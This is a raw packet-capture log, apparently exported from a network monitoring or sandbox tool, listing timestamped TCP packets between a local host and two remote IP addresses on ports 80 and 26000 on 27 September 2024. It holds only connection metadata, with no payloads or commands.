                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281198978 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281198978 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281248093 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281249046 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281249046 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281249046 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281303883 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281320095 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281332016 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281343937 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281368971 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281379938 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281390905 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281404972 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281415939 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281426907 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281438112 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281449080 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281460047 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281471014 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281481981 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281492949 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281502008 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281502008 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281511068 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281522989 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281534910 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281550884 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281550884 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281550884 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281552076 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281649113 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281649113 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281649113 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281666994 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281678915 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281689882 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281702995 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281732082 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281744003 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281755924 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281766891 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281793118 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281804085 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281815052 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281826019 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281836987 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281847954 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281852961 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281852961 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281866074 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281877041 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281888008 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281899929 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281902075 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281902075 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281902075 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281919003 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281929970 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281940937 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281950951 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281950951 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281950951 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281950951 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281963110 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281974077 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281985044 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281996012 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.281997919 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282011032 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282021999 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282032967 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282043934 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282047987 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282047987 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282047987 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282047987 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282064915 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282077074 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282088041 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282095909 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282097101 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282104015 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282145977 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282145977 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282195091 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282195091 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282208920 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282219887 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282232046 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282243013 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282254934 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282265902 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282277107 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282288074 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282298088 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282308102 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282314062 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282386065 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282490015 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282500029 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282510996 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282521963 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282532930 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282543898 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282556057 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282566071 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282577038 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282588005 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282598972 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282609940 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282659054 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282707930 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282707930 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282757044 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282757044 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282757998 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282779932 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.282918930 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414618969 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414716005 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414730072 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414741993 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414753914 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414764881 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414777040 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414778948 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414870024 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414870024 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414904118 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414906979 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414921999 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414933920 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414944887 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414954901 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414954901 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414962053 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414973974 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414984941 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.414995909 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415009022 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415019989 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415030956 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415041924 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415052891 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415064096 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415075064 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415079117 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415079117 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415092945 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415103912 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415127993 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415127993 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415127993 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415167093 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415177107 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415177107 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415177107 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415177107 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415189028 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415199995 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415210962 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415225029 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415246010 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415257931 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415268898 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415281057 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415323019 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415323019 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415339947 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415350914 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415361881 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415373087 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415374041 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415374041 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415389061 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415417910 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415430069 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415441036 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415452003 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415471077 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415518999 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415524960 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415549994 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415572882 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415584087 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415595055 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415606022 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415616989 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415662050 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415662050 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415747881 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.415747881 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416455984 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416471004 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416482925 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416493893 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416506052 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416517019 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416527987 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416538954 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416549921 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416560888 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416588068 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416588068 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416599989 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416611910 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416624069 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416636944 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416639090 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416639090 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416639090 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416639090 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416659117 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416671038 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416682005 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416683912 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416698933 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416709900 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416722059 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416733980 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416735888 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416749001 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416760921 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416831017 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416912079 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416912079 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.416912079 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.567873955 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568002939 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568052053 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568135977 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568142891 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568284988 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568300009 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.568444967 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.812882900 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.948133945 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.948345900 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:20.952899933 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.101319075 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.141834021 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.286287069 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.291513920 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.482328892 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.482532024 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.632934093 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.635288000 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.812422991 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.817783117 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.860055923 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.938437939 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.994957924 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:21.997284889 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.047401905 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.135008097 CEST8049737178.237.33.50192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.135020018 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.135179043 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.135179043 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.135325909 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.142798901 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.290613890 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.336378098 CEST8049737178.237.33.50192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.336648941 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.344264984 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.368805885 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.480743885 CEST2600049738102.165.14.28192.168.11.20
